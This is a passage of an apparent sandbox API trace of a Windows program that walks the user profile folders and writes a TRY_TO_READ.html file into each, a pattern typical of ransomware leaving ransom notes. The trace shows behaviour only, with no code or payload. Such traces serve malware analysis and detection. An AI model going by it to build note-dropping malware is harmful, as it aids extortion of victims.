[0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.550] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e008 | out: hHeap=0x2e0000) returned 1 [0116.550] FindFirstFileW (in: lpFileName="C:\\\\System Volume Information\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e008 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324170 | out: hHeap=0x2e0000) returned 1 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e030 | out: hHeap=0x2e0000) returned 1 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e058 | out: hHeap=0x2e0000) returned 1 [0116.551] FindFirstFileW (in: lpFileName="C:\\\\Users\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x317cc8 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.551] GetLastError () returned 0x5 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e030 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317d08 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317d08 | out: hHeap=0x2e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e030 | out: hHeap=0x2e0000) returned 1 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.551] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f232f0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.551] GetLastError () returned 0x5 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e030 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317d08 [0116.551] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317d08 | out: hHeap=0x2e0000) returned 1 [0116.551] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e030 | out: hHeap=0x2e0000) returned 1 [0116.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.552] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0116.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.552] GetLastError () returned 0x5 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344500 | out: hHeap=0x2e0000) returned 1 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324170 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e030 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.552] GetLastError () returned 0x5 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.552] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.552] GetLastError () returned 0x5 [0116.552] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x60) returned 0x3387c0 [0116.552] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ec [0116.553] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3387c0 | out: hHeap=0x2e0000) returned 1 [0116.553] WriteFile (in: hFile=0x3ec, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.554] WriteFile (in: hFile=0x3ec, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.554] WriteFile (in: hFile=0x3ec, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.554] CloseHandle (hObject=0x3ec) returned 1 [0116.554] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.554] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a78 | out: hHeap=0x2e0000) returned 1 [0116.554] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.554] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.554] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0116.554] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.554] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.554] GetLastError () returned 0x0 [0116.554] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dea0 [0116.554] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.554] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0116.554] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dec8 | out: hHeap=0x2e0000) returned 1 [0116.554] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0116.554] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dec8 [0116.554] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.554] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.555] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.555] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.555] GetLastError () returned 0x0 [0116.555] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.555] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.555] GetLastError () returned 0x0 [0116.555] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324bf0 [0116.555] CreateFileW (lpFileName="C:\\\\Users\\All Users\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ec [0116.555] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.555] WriteFile (in: hFile=0x3ec, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.556] WriteFile (in: hFile=0x3ec, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.556] WriteFile (in: hFile=0x3ec, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.556] CloseHandle (hObject=0x3ec) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a78 | out: hHeap=0x2e0000) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.557] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.557] GetLastError () returned 0x0 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dea0 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x317d08 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x317d08 | out: hHeap=0x2e0000) returned 1 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344538 | out: hHeap=0x2e0000) returned 1 [0116.557] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.557] GetLastError () returned 0x0 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34dea0 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350818 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34dea0 | out: hHeap=0x2e0000) returned 1 [0116.557] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350818 | out: hHeap=0x2e0000) returned 1 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344538 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350818 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.557] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.558] GetLastError () returned 0x0 [0116.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.558] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.558] GetLastError () returned 0x0 [0116.558] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324bf0 [0116.558] CreateFileW (lpFileName="C:\\\\Users\\Default User\\TRY_TO_READ.html" (normalized: "c:\\users\\default user\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ec [0116.558] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.558] WriteFile (in: hFile=0x3ec, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.559] WriteFile (in: hFile=0x3ec, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.559] WriteFile (in: hFile=0x3ec, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.559] CloseHandle (hObject=0x3ec) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a78 | out: hHeap=0x2e0000) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.560] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.560] GetLastError () returned 0x0 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350840 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350840 | out: hHeap=0x2e0000) returned 1 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.560] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0116.560] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.560] GetLastError () returned 0x0 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344688 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350840 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a68 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330a78 [0116.560] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.560] GetLastError () returned 0x0 [0116.561] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328578 [0116.561] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.561] GetLastError () returned 0x0 [0116.561] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x50) returned 0x324bf0 [0116.561] CreateFileW (lpFileName="C:\\\\Users\\Public\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ec [0116.561] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.561] WriteFile (in: hFile=0x3ec, lpBuffer=0x348ed8*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x348ed8*, lpNumberOfBytesWritten=0x2acfb00*=0x548, lpOverlapped=0x0) returned 1 [0116.562] WriteFile (in: hFile=0x3ec, lpBuffer=0x45a1f8*, nNumberOfBytesToWrite=0xf28, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x45a1f8*, lpNumberOfBytesWritten=0x2acfb00*=0xf28, lpOverlapped=0x0) returned 1 [0116.562] WriteFile (in: hFile=0x3ec, lpBuffer=0x4428d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2acfb00, lpOverlapped=0x0 | out: lpBuffer=0x4428d0*, lpNumberOfBytesWritten=0x2acfb00*=0x4b, lpOverlapped=0x0) returned 1 [0116.562] CloseHandle (hObject=0x3ec) returned 1 [0116.562] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328578 | out: hHeap=0x2e0000) returned 1 [0116.562] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a78 | out: hHeap=0x2e0000) returned 1 [0116.562] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x330a68 | out: hHeap=0x2e0000) returned 1 [0116.562] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.562] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f49450, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.562] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.563] GetLastError () returned 0x0 [0116.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.563] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.563] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.563] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.563] FindNextFileW (in: hFindFile=0x317cc8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96f232f0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x96f232f0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x96f49450, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.563] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x3560d0 [0116.563] RtlAllocateHeap 